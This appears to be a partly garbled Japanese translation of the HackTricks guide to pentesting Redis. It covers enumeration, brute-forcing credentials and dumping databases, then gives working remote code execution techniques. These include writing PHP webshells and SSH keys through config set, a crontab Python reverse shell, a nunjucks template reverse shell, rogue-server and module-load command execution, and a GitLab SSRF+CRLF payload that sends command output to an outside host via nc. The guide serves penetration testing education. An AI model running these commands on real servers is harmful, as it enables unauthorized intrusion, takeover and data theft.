22 KiB
6379 - Pentesting Redis
{% hint style="success" %}
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- ハッキングのトリックを共有するには、HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出してください。
HackenProof Discordサーバーに参加して、経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取りましょう!
ハッキングの洞察
ハッキングのスリルと課題に深く掘り下げたコンテンツに参加する
リアルタイムハックニュース
リアルタイムのニュースと洞察を通じて、急速に変化するハッキングの世界に遅れずについていく
最新の発表
新しいバグバウンティの開始や重要なプラットフォームの更新について情報を得る
Discordに参加して、今日からトップハッカーとコラボレーションを始めましょう!
基本情報
ドキュメントから:Redisはオープンソース(BSDライセンス)のインメモリデータ構造ストアで、データベース、キャッシュ、メッセージブローカーとして使用されます。
デフォルトではRedisはプレーンテキストベースのプロトコルを使用しますが、ssl/tlsを実装することもできることを念頭に置いておく必要があります。ssl/tlsでRedisを実行する方法はこちらを学んでください。
デフォルトポート: 6379
PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 4.0.9
自動列挙
Redisインスタンスから情報を取得するのに役立ついくつかの自動化ツール:
nmap --script redis-info -sV -p 6379 <IP>
msf> use auxiliary/scanner/redis/redis_server
手動列挙
バナー
Redisはテキストベースのプロトコルであり、ソケットにコマンドを送信するだけで、返された値は読み取ることができます。また、Redisはssl/tlsを使用して実行できることを忘れないでください(ただし、これは非常に珍しいです)。
通常のRedisインスタンスでは、nc
を使用して接続するか、redis-cli
を使用することもできます:
nc -vn 10.10.10.10 6379
redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools
最初のコマンドとして試すことができるのは info
です。これは、Redisインスタンスの情報を含む出力を返すか、次のようなものが返される可能性があります:
-NOAUTH Authentication required.
In this last case, this means that 有効な資格情報が必要です to access the Redis instance.
Redis 認証
デフォルトでは Redis can be accessed 資格情報なしで. However, it can be 設定されて to support パスワードのみ、またはユーザー名 + パスワード.
It is possible to パスワードを設定する in redis.conf file with the parameter requirepass
または一時的に until the service restarts connecting to it and running: config set requirepass p@ss$12E45
.
Also, a ユーザー名 can be configured in the parameter masteruser
inside the redis.conf file.
{% hint style="info" %}
If only password is configured the username used is "default".
Also, note that there is 外部から確認する方法はありません if Redis was configured with only password or username+password.
{% endhint %}
In cases like this one you will 有効な資格情報を見つける必要があります to interact with Redis so you could try to ブルートフォース it.
有効な資格情報が見つかった場合は、接続を確立した後にセッションを認証する必要があります with the command:
AUTH <username> <password>
有効な資格情報には次のように応答されます: +OK
認証された列挙
Redisサーバーが匿名接続を許可している場合、または有効な資格情報を取得している場合は、次のコマンドを使用してサービスの列挙プロセスを開始できます:
INFO
[ ... Redis response with info ... ]
client list
[ ... Redis response with connected clients ... ]
CONFIG GET *
[ ... Get config ... ]
インスタンスのRedisコマンドは redis.conf ファイルで名前を変更したり削除したりできます。例えば、この行はFLUSHDBコマンドを削除します:
rename-command FLUSHDB ""
Redisサービスを安全に構成する方法についての詳細はこちら: https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04
また、monitor
コマンドを使用して実行されたRedisコマンドをリアルタイムで監視したり、slowlog get 25
を使用して25の最も遅いクエリを取得することもできます。
さらに興味深いRedisコマンドに関する情報はここで見つけることができます: https://lzone.de/cheat-sheet/Redis
データベースのダンプ
Redis内では、データベースは0から始まる番号です。info
コマンドの出力内の「Keyspace」チャンクで、どのデータベースが使用されているかを確認できます:
または、次のコマンドで全てのキー空間(データベース)を取得することもできます:
INFO keyspace
その例では、データベース 0 と 1 が使用されています。データベース 0 には 4 つのキーがあり、データベース 1 には 1 つのキーがあります。デフォルトでは、Redis はデータベース 0 を使用します。たとえば、データベース 1 をダンプするには、次のようにする必要があります:
SELECT 1
[ ... Indicate the database ... ]
KEYS *
[ ... Get Keys ... ]
GET <KEY>
[ ... Get Key ... ]
GET <KEY>
を実行中に-WRONGTYPE Operation against a key holding the wrong kind of value
というエラーが発生した場合、それはキーが文字列や整数以外のものであり、表示するために特別なオペレーターが必要であるためです。
キーのタイプを知るには、TYPE
コマンドを使用します。以下はリストとハッシュキーの例です。
TYPE <KEY>
[ ... Type of the Key ... ]
LRANGE <KEY> 0 -1
[ ... Get list items ... ]
HGET <KEY> <FIELD>
[ ... Get hash item ... ]
# If the type used is weird you can always do:
DUMP <key>
npmを使用してデータベースをダンプする redis-dump またはpython redis-utils
経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取るためにHackenProof Discordサーバーに参加してください!
ハッキングの洞察
ハッキングのスリルと課題に深く掘り下げたコンテンツに参加してください
リアルタイムハックニュース
リアルタイムのニュースと洞察を通じて、急速に進化するハッキングの世界を最新の状態に保ちましょう
最新のお知らせ
新しいバグバウンティの開始や重要なプラットフォームの更新について情報を得てください
今日、Discordで私たちに参加し、トップハッカーとコラボレーションを始めましょう!
Redis RCE
インタラクティブシェル
redis-rogue-serverは、Redis(<=5.0.5)でインタラクティブシェルまたはリバースシェルを自動的に取得できます。
./redis-rogue-server.py --rhost <TARGET_IP> --lhost <ACCACKER_IP>
PHP Webshell
こちらの情報。Webサイトフォルダのパスを知っておく必要があります:
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK
10.85.0.52:6379> config set dbfilename redis.php
OK
10.85.0.52:6379> set test "<?php phpinfo(); ?>"
OK
10.85.0.52:6379> save
OK
ウェブシェルアクセス例外が発生した場合、バックアップ後にデータベースを空にして再試行できます。データベースを復元することを忘れないでください。
テンプレートウェブシェル
前のセクションと同様に、テンプレートエンジンによって解釈されるいくつかのHTMLテンプレートファイルを上書きしてシェルを取得することもできます。
例えば、この書き込みに従って、攻撃者がnunjucksテンプレートエンジンによって解釈されるHTMLにrevシェルを注入したことがわかります。
{{ ({}).constructor.constructor(
"var net = global.process.mainModule.require('net'),
cp = global.process.mainModule.require('child_process'),
sh = cp.spawn('sh', []);
var client = new net.Socket();
client.connect(1234, 'my-server.com', function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});"
)()}}
{% hint style="warning" %} 注意してください。いくつかのテンプレートエンジンはテンプレートをメモリにキャッシュするため、上書きしても新しいものは実行されません。この場合、開発者が自動リロードを有効にしたままにしているか、サービスに対してDoSを実行する必要があります(自動的に再起動されることを期待してください)。 {% endhint %}
SSH
例 こちらから
config get dir
の結果は、他の手動のエクスプロイトコマンドの後に変更される可能性があることに注意してください。Redisにログインした直後にこれを最初に実行することをお勧めします。config get dir
の出力には、redisユーザーのホーム(通常は /var/lib/redis または /home/redis/.ssh)が見つかり、これを知ることで、redisユーザーでssh経由でアクセスするために authenticated_users
ファイルを書き込む場所がわかります。他の有効なユーザーのホームを知っていて、書き込み権限がある場合は、それを悪用することもできます:
- PCでssh公開鍵-秘密鍵ペアを生成します:
ssh-keygen -t rsa
- 公開鍵をファイルに書き込みます:
(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
- ファイルをredisにインポートします:
cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key
- Redisサーバーのauthorized_keysファイルに公開鍵を保存します:
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /var/lib/redis/.ssh
OK
10.85.0.52:6379> config set dbfilename "authorized_keys"
OK
10.85.0.52:6379> save
OK
- 最後に、秘密鍵を使ってredisサーバーにssh接続できます:ssh -i id_rsa redis@10.85.0.52
この技術はここで自動化されています: https://github.com/Avinash-acid/Redis-Server-Exploit
Crontab
root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK
The last example is for Ubuntu, for Centos, the above command should be: redis-cli -h 10.85.0.52 config set dir /var/spool/cron/
この方法はビットコインを得るためにも使用できます:yam
Load Redis Module
- https://github.com/n0b0dyCN/RedisModules-ExecuteCommand の指示に従って、任意のコマンドを実行するためのredisモジュールをコンパイルできます。
- 次に、コンパイルされたモジュールをアップロードする方法が必要です。
MODULE LOAD /path/to/mymodule.so
でアップロードされたモジュールをランタイムでロードします。MODULE LIST
でロードされたモジュールをリストして、正しくロードされたか確認します。- コマンドを実行します:
127.0.0.1:6379> system.exec "id"
"uid=0(root) gid=0(root) groups=0(root)\n"
127.0.0.1:6379> system.exec "whoami"
"root\n"
127.0.0.1:6379> system.rev 127.0.0.1 9999
- 必要に応じてモジュールをアンロードします:
MODULE UNLOAD mymodule
LUA sandbox bypass
ここで、RedisがLuaコードをサンドボックス化して実行するためにコマンドEVALを使用していることがわかります。リンクされた投稿では、dofile関数を使用してそれを悪用する方法が示されていますが、どうやらこれはもはや不可能なようです。いずれにせよ、Luaサンドボックスをバイパスできれば、システム上で任意のコマンドを実行できます。また、同じ投稿からDoSを引き起こすためのオプションも確認できます。
Luaから脱出するためのいくつかのCVE:
Master-Slave Module
マスターレディスのすべての操作は自動的にスレーブレディスに同期されます。つまり、脆弱性のあるredisをスレーブredisと見なすことができ、マスターレディスに接続されている自分の制御下にあるredisにコマンドを入力できます。
master redis : 10.85.0.51 (Hacker's Server)
slave redis : 10.85.0.52 (Target Vulnerability Server)
A master-slave connection will be established from the slave redis and the master redis:
redis-cli -h 10.85.0.52 -p 6379
slaveof 10.85.0.51 6379
Then you can login to the master redis to control the slave redis:
redis-cli -h 10.85.0.51 -p 6379
set mykey hello
set mykey2 helloworld
SSRFがRedisと通信する
もし平文リクエストをRedisに送信できるなら、Redisはリクエストを行ごとに読み取り、理解できない行にはエラーで応答するため、それと通信することができます。
-ERR wrong number of arguments for 'get' command
-ERR unknown command 'Host:'
-ERR unknown command 'Accept:'
-ERR unknown command 'Accept-Encoding:'
-ERR unknown command 'Via:'
-ERR unknown command 'Cache-Control:'
-ERR unknown command 'Connection:'
したがって、ウェブサイトでSSRF vulnを見つけ、いくつかのheaders(おそらくCRLF vulnを使用して)やPOSTパラメータを制御できる場合、Redisに任意のコマンドを送信することができます。
例: Gitlab SSRF + CRLF to Shell
Gitlab11.4.7では、SSRF脆弱性とCRLFが発見されました。SSRF脆弱性は、新しいプロジェクトを作成する際のURLからプロジェクトをインポートする機能にあり、[0:0:0:0:0:ffff:127.0.0.1]の形式で任意のIPにアクセスできるようにしました(これにより127.0.0.1にアクセスします)、そしてCRLF脆弱性はURLに**%0D%0A**文字を追加することで悪用されました。
したがって、これらの脆弱性を悪用してRedisインスタンスと通信することが可能であり、gitlabのキューを管理し、そのキューを悪用してコード実行を取得することができました。Redisキュー悪用ペイロードは:
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
そして、URLエンコードリクエストを悪用したSSRFとCRLFを使用してwhoami
を実行し、出力をnc
経由で返すのは次の通りです:
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
For some reason (as for the author of https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ where this info was took from) the exploitation worked with the git
scheme and not with the http
scheme.
経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取るために、HackenProof Discord サーバーに参加してください!
ハッキングの洞察
ハッキングのスリルと課題に深く掘り下げたコンテンツに参加してください
リアルタイムハックニュース
リアルタイムのニュースと洞察を通じて、急速に変化するハッキングの世界を最新の状態に保ちましょう
最新のお知らせ
新しいバグバウンティの開始や重要なプラットフォームの更新について情報を得てください
今日、Discord で私たちに参加し、トップハッカーとコラボレーションを始めましょう!
{% hint style="success" %}
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- 💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。**
- HackTricksおよびHackTricks CloudのgithubリポジトリにPRを提出してハッキングのトリックを共有してください。